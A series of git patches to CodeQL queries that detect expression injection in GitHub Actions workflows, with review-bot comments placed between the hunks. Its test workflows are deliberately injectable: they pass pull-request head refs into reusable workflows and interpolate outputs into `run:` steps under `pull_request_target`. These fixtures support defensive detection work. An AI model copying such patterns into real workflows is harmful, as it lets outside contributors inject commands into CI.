From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 10:50:02 +0100 Subject: [PATCH 059/707] feat(model-generation): Add more model generation queries Add new queries for finding reusable workflows that behave as summaries, sources or sinks. Add new query for finding composite actions that behave as sinks. Add `github.event.inputs` context to the regular expression matching input var accesses. --- ql/lib/codeql/actions/Ast.qll | 5 +- .../CWE-020/CompositeActionSummaries.ql | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 42 +++++++++++++++++ .../CWE-020/CompositeActionsSources.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 42 +++++++++++++++++ .../CWE-020/ReusableWorkflowsSources.ql | 46 +++++++++++++++++++ .../CWE-020/ReusableWorkflowsSummaries.ql | 37 +++++++++++++++ 7 files changed, 177 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSources.ql create mode 100644 ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index b04694ed5689..605f658b263b 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -369,7 +369,10 @@ private string jobsCtxRegex() { private string envCtxRegex() { result = "\\benv\\.([A-Za-z0-9_-]+)\\b" } -private string inputsCtxRegex() { result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" } +private string inputsCtxRegex() { + result = "\\binputs\\.([A-Za-z0-9_-]+)\\b" or + result = "\\bgithub\\.event\\.inputs\\.([A-Za-z0-9_-]+)\\b" +} /** * Holds for an expression accesing the `steps` context. diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index e2843326e74e..b451d9d1bda2 100644 --- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql 
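Review bot: The new `\bgithub\.event\.inputs\.([A-Za-z0-9_-]+)\b` alternative treats `workflow_dispatch` inputs as the same context as the `inputs.` parameters of composite actions and reusable workflows, which the predicate name suggests is intended, but depending on how `inputsCtxRegex()` is consumed the first alternative may already match inside `github.event.inputs.foo` (the `.` before `inputs` is a word boundary), so a find-style use would yield two matches for one access. Add QLDoc stating the intent, e.g. `/** Matches inputs.X and its workflow_dispatch spelling github.event.inputs.X; both denote declared input parameters. */`, and a test that a `github.event.inputs.foo` access yields exactly one input name.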
+++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -31,5 +31,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Summary" diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql new file mode 100644 index 000000000000..525307bcc28b --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -0,0 +1,42 @@ +/** + * @name Composite Action Sinks + * @description Actions passing input variables to expression injection sinks. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/composite-action-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" 
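Review bot: `ExpressionInjectionSink` is declared as a private class in this query and again, byte for byte, in `ReusableWorkflowsSinks.ql` from the same commit; the copies will drift the first time the `RunExpr` or `externallyDefinedSink` modelling changes, so it belongs in the library next to the other flow classes, with both queries importing it. The metadata also carries `@security-severity 9.3` and `@problem.severity warning` on a model-generator query, so any suite that selects by severity rather than by the `model-generator` tag will surface every 'Sink' result as a high-severity alert; drop the security severity or document why it is set. A comment on `isSource`, e.g. `// every declared input of the composite action is a candidate source`, and one on the same-file restriction in `where` would make the query self-explaining.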
diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 67adac7dd324..b3eb6d348a85 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql @@ -40,5 +40,7 @@ module MyFlow = TaintTracking::Global; import MyFlow::PathGraph from MyFlow::PathNode source, MyFlow::PathNode sink -where MyFlow::flowPath(source, sink) +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql new file mode 100644 index 000000000000..9317b9001581 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
@@ -0,0 +1,42 @@ +/** + * @name Reusable Workflow Sinks + * @description Reusable Workflows passing parameters to an expression injection sink. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-wokflow-sinks + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Sink" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql new file mode 100644 index 000000000000..eeea688b273f --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql 
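Review bot: The query id `actions/reusable-wokflow-sinks` is misspelled and inconsistent with `actions/reusable-workflow-sources` and `actions/reusable-workflow-summaries` from the same commit; ids end up as SARIF rule ids and in alert suppressions, so correct it before it ships: `@id actions/reusable-workflow-sinks`. The private `ExpressionInjectionSink` duplicates the one in `CompositeActionsSinks.ql` and should be shared from the library rather than copied.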
@@ -0,0 +1,46 @@ +/** + * @name Reusable Workflow Sources + * @description Reusable Workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-sources + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source instanceof DataFlow::ParameterNode and + exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } + + predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { + allowImplicitRead(node, set) + or + isSink(node) and + set instanceof DataFlow::FieldContent + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Source" diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql new file mode 100644 index 000000000000..3949488e1298 --- /dev/null +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql 
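Review bot: `allowImplicitRead` is defined as `allowImplicitRead(node, set) or isSink(node) and set instanceof DataFlow::FieldContent`; the first disjunct is the predicate itself, and QL evaluates such a recursive definition to its least fixpoint, which is just the second disjunct, so the self-reference contributes nothing and reads like a half-finished delegation to some base predicate. Reduce it to `predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { isSink(node) and set instanceof DataFlow::FieldContent }` and add a comment on why sinks need the implicit read (the output expression is reached through a stored field content). The description also has an agreement slip; `Reusable workflows that pass user-controlled data to their output variables.`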
@@ -0,0 +1,37 @@ +/** + * @name Reusable Workflows Summaries + * @description Reusable workflow that pass user-controlled data to their output variables. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/reusable-workflow-summaries + * @tags actions + * model-generator + * external/cwe/cwe-020 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + } + + predicate isSink(DataFlow::Node sink) { + exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source.getNode().getLocation().getFile() = sink.getNode().getLocation().getFile() +select sink.getNode(), source, sink, "Summary" From 010d7df71d36ec98e41f03827fcc14fc949ad1b6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 11:58:54 +0100 Subject: [PATCH 060/707] feat(reusable-workflow-models): Reusable workflow MaD Add support to define sources/sinks/summaries for Reusable Workflows as MaD entries. --- .../actions/controlflow/internal/Cfg.qll | 16 ++------------- .../dataflow/internal/DataFlowPrivate.qll | 20 ++++++++++++++++++- .../dataflow/internal/DataFlowPublic.qll | 11 ++++++++++ ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ++++++++++++++++ ql/lib/test/test.ql | 13 ++++++------ .../.github/workflows/calling_workflow.yml | 16 +++++++++++---- 6 files changed, 67 insertions(+), 26 deletions(-) create mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml 
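Review bot: The `@description` is copied from the Sources query ("Reusable workflow that pass user-controlled data to their output variables"), but this query's sources are the workflow's declared inputs and its sinks are its outputs, so it finds input-to-output propagation rather than user-controlled data; use `@description Reusable workflows whose input parameters flow to their output variables.` As in the sibling model-generator queries, `@security-severity 9.3` will make a severity-selected suite report each 'Summary' as a high-severity alert, so drop it or explain it. A comment on the `where` clause such as `// source and sink must belong to the same reusable workflow file` would document the file restriction.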
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8808fb0afe53..94a2c6a71e2c 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -243,21 +243,9 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class StepUsesTree extends StandardPreOrderTree instanceof StepUsesExpr { - override ControlFlowTree getChildNode(int i) { - result = - rank[i](Expression child, Location l | - (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } -} +private class UsesExprTree extends LeafTree instanceof UsesExpr { } -private class JobUsesTree extends StandardPreOrderTree instanceof JobUsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 89f31983189a..e1a3479cfc0e 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -58,7 +58,7 @@ class DataFlowExpr extends Cfg::Node { } /** - * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow gets called + * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { DataFlowCall() { super.getAstNode() instanceof UsesExpr } 
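Review bot: Two `ControlFlowTree` implementations now claim the same AST node: `UsesExprTree extends LeafTree instanceof UsesExpr` declares a `UsesExpr` childless, while `UsesTree extends StandardPreOrderTree instanceof UsesExpr` immediately below enumerates its argument and env children. Unless the CFG library arbitrates between overlapping tree classes, which it is not known to do, this yields contradictory successor edges for every Uses step; since both replaced classes (`StepUsesTree`, `JobUsesTree`) had children, `UsesExprTree` looks like a leftover and should be removed. `UsesTree.getChildNode` continues past the end of the hunk.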
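Review bot: The reworded QLDoc on `DataFlowCall` is now ungrammatical: `a 3rd party action or a reusable workflow get called` needs `gets called`, and `a Uses steps` should be singular. Suggest `/** A call corresponds to a Uses step in which a third-party action or a reusable workflow gets called. */`.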
@@ -180,6 +180,23 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { ) } +/** + * Holds if there is a local flow step between a ${{ needs.xxx.outputs.yyy }} expression accesing a job output field + * and the step output itself. But only for those cases where the job (needs) output is defined externally in a MaD Source + * specification. The reason for this is that we don't currently have a way to specify that a source starts with a + * non-empty access path so we cannot write a Source that stores the taint in a Content, we can only do that for steps + * (storeStep). The easiest thing is to add this local flow step that simulates a read step from the source node for a specific + * field name. + */ +predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { + exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getRefExpr() = astFrom + ) +} + /** * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} @@ -215,6 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { stepsCtxLocalStep(nodeFrom, nodeTo) or + needsCtxLocalStep(nodeFrom, nodeTo) or inputsCtxLocalStep(nodeFrom, nodeTo) or envCtxLocalStep(nodeFrom, nodeTo) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 8b62cccf30af..5fe3c7417351 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
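Review bot: The QLDoc on the new `needsCtxLocalStep` spells `accesing` for `accessing`, and at six lines it reads more like a design note than a contract; a one-line summary first, `Holds if there is a local flow step from a MaD-defined job output (the Uses node) to a \`${{ needs.<job>.outputs.<field> }}\` access of that field.`, followed by the existing rationale would help readers who only need the predicate's meaning. The step also keys solely on `"output." + astTo.getFieldName()` and ignores the model row's source type (`_`), which matches `stepsCtxLocalStep` above it but is worth stating in the doc so nobody later narrows one without the other.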
@@ -66,6 +66,17 @@ class ParameterNode extends ExprNode { InputExpr getInputExpr() { result = input } } +/** + * A call to a data flow callable (Uses). + */ +class CallNode extends ExprNode { + private DataFlowCall call; + + CallNode() { this.getCfgNode() instanceof DataFlowCall } + + string getCallee() { result = this.getCfgNode().(DataFlowCall).getName() } +} + /** * An argument to a Uses step (call). */ diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml new file mode 100644 index 000000000000..7adbcd5adbd1 --- /dev/null +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: summaryModel + data: + - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"] + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "expression-injection"] diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 4b2be43bbdaf..168987284c31 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql 
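Review bot: `private DataFlowCall call;` in the new `CallNode` class is declared but never bound by `CallNode()`, and `getCallee()` re-casts `this.getCfgNode()` instead of using it; as far as I can tell an unbound field is rejected by the QL compiler, and if it is accepted it is dead code. Either drop the field or bind it: `CallNode() { call = this.getCfgNode() }` and `string getCallee() { result = call.getName() }`. `getCallee()` also lacks QLDoc; `/** Gets the name of the action or reusable workflow this node calls. */` would match the file's style.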
@@ -43,14 +43,9 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { - //any() - n.getAstNode() instanceof OutputsStmt -} +query predicate cfgNodes(Cfg::Node n) { any() } -query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "argus_case_study.yml" -} +query predicate dfNodes(DataFlow::Node e) { any() } query predicate exprNodes(DataFlow::ExprNode e) { any() } @@ -69,3 +64,7 @@ query predicate sources(string action, string version, string output, string tri query predicate summaries(string action, string version, string input, string output, string kind) { summaryModel(action, version, input, output, kind) } + +query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } + +query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } diff --git a/ql/src/test/.github/workflows/calling_workflow.yml b/ql/src/test/.github/workflows/calling_workflow.yml index 9aafe1189efa..7c2bfdf0348f 100644 --- a/ql/src/test/.github/workflows/calling_workflow.yml +++ b/ql/src/test/.github/workflows/calling_workflow.yml 
@@ -8,17 +8,20 @@ jobs: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit call3: - uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + uses: octo-org/summary-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + call4: + uses: octo-org/source-repo/.github/workflows/workflow.yml@v1 + call5: + uses: octo-org/sink-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} - secrets: inherit job1: runs-on: ubuntu-latest @@ -36,3 +39,8 @@ jobs: needs: call3 steps: - run: echo ${{ needs.call3.outputs.workflow-output }} + job4: + runs-on: ubuntu-latest + needs: call4 + steps: + - run: echo ${{ needs.call4.outputs.workflow-output }} From a2210dca79e5bbd4bda0b1bbe3d965c58facfdc2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 20 Feb 2024 21:48:29 +0100 Subject: [PATCH 061/707] feat(triggers): Add getEnclosingWorkflowStmt to Statement class --- ql/lib/codeql/actions/Ast.qll | 22 ++++++--- .../CWE-094/CriticalExpressionInjection.ql | 47 +++++++++++++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- ql/src/test/.github/workflows/simple2.yml | 5 +- 4 files changed, 64 insertions(+), 12 deletions(-) create mode 100644 ql/src/Security/CWE-094/CriticalExpressionInjection.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 605f658b263b..5037a55d6329 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -20,7 +20,10 @@ class AstNode instanceof YamlNode { * A statement is a group of expressions and/or statements that you design to carry out a task or an action. * Any statement that can return a value is automatically qualified to be used as an expression. */ -class Statement extends AstNode { } +class Statement extends AstNode { + /** Gets the workflow that this job is a part of. */ + WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } +} /** * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. @@ -53,6 +56,14 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJobStmt() { result = super.getJob(_) } JobStmt getJobStmt(string id) { result = super.getJob(id) } + + predicate hasTriggerEvent(string trigger) { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(trigger)) + } + + string getATriggerEvent() { + exists(YamlNode n | n = super.getOn().(YamlMappingLikeNode).getNode(result)) + } } class ReusableWorkflowStmt extends WorkflowStmt { @@ -122,9 +133,6 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the workflow that this job is a part of. */ - WorkflowStmt getWorkflowStmt() { result = super.getWorkflow() } - /** Gets the step at the given index within this job. */ StepStmt getStepStmt(int index) { result = super.getStep(index) } @@ -222,7 +230,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } 
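Review bot: `getEnclosingWorkflowStmt()` in the first Ast.qll hunk never mentions `this`: `exists(WorkflowStmt w | w.getAChildNode*() = result)` holds for any workflow that is among its own transitive children, so every `Statement` in the database gets every `WorkflowStmt` as its enclosing workflow, and the `hasTriggerEvent` filter in the new query will match a trigger declared in any file. It should read `exists(WorkflowStmt w | w.getAChildNode*() = this and result = w)`, which is what [PATCH 062/707] later applies; the identical hunk is repeated verbatim in [PATCH 063/707]. The new `hasTriggerEvent`/`getATriggerEvent` go through `super.getOn().(YamlMappingLikeNode)`, so the scalar form `on: push` presumably yields no trigger at all and such workflows silently drop out of the critical query; a test workflow in that form, or a QLDoc caveat on both predicates, would make that visible.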
@@ -287,7 +295,7 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } @@ -320,7 +328,7 @@ class RunExpr extends StepStmt, Expression { ) or exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getWorkflowStmt() and + env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) ) } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql new file mode 100644 index 000000000000..624bd32e45cb --- /dev/null +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql 
@@ -0,0 +1,47 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision high + * @id actions/critical-expression-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.ExternalFlow + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { + exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + externallyDefinedSink(this, "expression-injection") + } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where + MyFlow::flowPath(source, sink) and + source + .getNode() + .asExpr() + .(Statement) + .getEnclosingWorkflowStmt() + .hasTriggerEvent("pull_request_target") +select sink.getNode(), source, sink, + "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 99779d6cc907..c34fcb74bbc0 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -4,7 +4,7 @@ * user to inject code into the GitHub action. * @kind path-problem * @problem.severity warning - * @security-severity 9.3 + * @security-severity 5.0 * @precision high * @id actions/expression-injection * @tags actions 
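Review bot: The new query keeps `@name Expression injection in Actions` and the same `@description` as `ExpressionInjection.ql`, so the two are indistinguishable in result listings even though one is now `error`/9 and the other is demoted to `warning`/5.0; give this one a distinct name such as `@name Expression injection in Actions (critical triggers)` and state in the description that it only reports sources reachable under a `pull_request_target` trigger. The `where` clause also casts the source expression with `.(Statement)`; `RemoteFlowSource` nodes are expressions, so if those expression classes are not also `Statement`s the cast is empty and the query reports nothing — defining `getEnclosingWorkflowStmt` on `AstNode` would remove the need for the cast. The same new file appears again in [PATCH 063/707].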
diff --git a/ql/src/test/.github/workflows/simple2.yml b/ql/src/test/.github/workflows/simple2.yml index b40f5eb6ac05..8271f93d857f 100644 --- a/ql/src/test/.github/workflows/simple2.yml +++ b/ql/src/test/.github/workflows/simple2.yml @@ -1,9 +1,6 @@ name: CI -on: - pull_request: - branches: - - main +on: [pull_request_target, pull_request] jobs: changed_files: From 3814462266e9482cc9686f60257006f45f8165bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 21 Feb 2024 10:23:37 +0100 Subject: [PATCH 062/707] feat(triggers): New query for critical issues Adds a new query and the required changes to be able to account for the trigger events so that we dont report issues if they are not likely exploitable. --- ql/lib/codeql/actions/Ast.qll | 4 +- .../codeql/actions/dataflow/ExternalFlow.qll | 6 ++- .../codeql/actions/dataflow/FlowSources.qll | 38 ++++++++++++++----- .../dataflow/internal/DataFlowPrivate.qll | 4 +- ...ahmadnassri_action-changed-files.model.yml | 2 - ql/lib/ext/dorny_paths-filter.model.yml | 1 - .../ext/jitterbit_get-changed-files.model.yml | 7 ---- ql/lib/ext/tj-actions_branch-names.model.yml | 11 ++++++ ql/lib/ext/tj-actions_changed-files.model.yml | 17 --------- .../tj-actions_verify-changed-files.model.yml | 1 - .../CWE-094/CriticalExpressionInjection.ql | 2 +- 11 files changed, 50 insertions(+), 43 deletions(-) create mode 100644 ql/lib/ext/tj-actions_branch-names.model.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 5037a55d6329..2e93187b6bf0 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,7 +22,9 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { exists(WorkflowStmt w | w.getAChildNode*() = result) } + WorkflowStmt getEnclosingWorkflowStmt() { + exists(WorkflowStmt w | w.getAChildNode*() = this and result = w) + } } /** 
diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
index 6446fbb55728..594b6017729e 100644
--- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
+++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll
@@ -39,8 +39,10 @@ predicate sinkModel(string action, string version, string input, string kind) {
 Extensions::sinkModel(action, version, input, kind)
 }
-predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) {
- exists(UsesExpr uses, string action, string version, string trigger, string kind |
+predicate externallyDefinedSource(
+ DataFlow::Node source, string sourceType, string fieldName, string trigger
+) {
+ exists(UsesExpr uses, string action, string version, string kind |
 sourceModel(action, version, fieldName, trigger, kind) and
 uses.getCallee() = action.toLowerCase() and
 (
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index 09094f2c580c..0e82498bfc15 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -17,6 +17,8 @@ abstract class RemoteFlowSource extends SourceNode {
 /** Gets a string that describes the type of this remote flow source. */
 abstract string getSourceType();
+ abstract string getATriggerEvent();
+
 override string getThreatModel() { result = "remote" }
 }
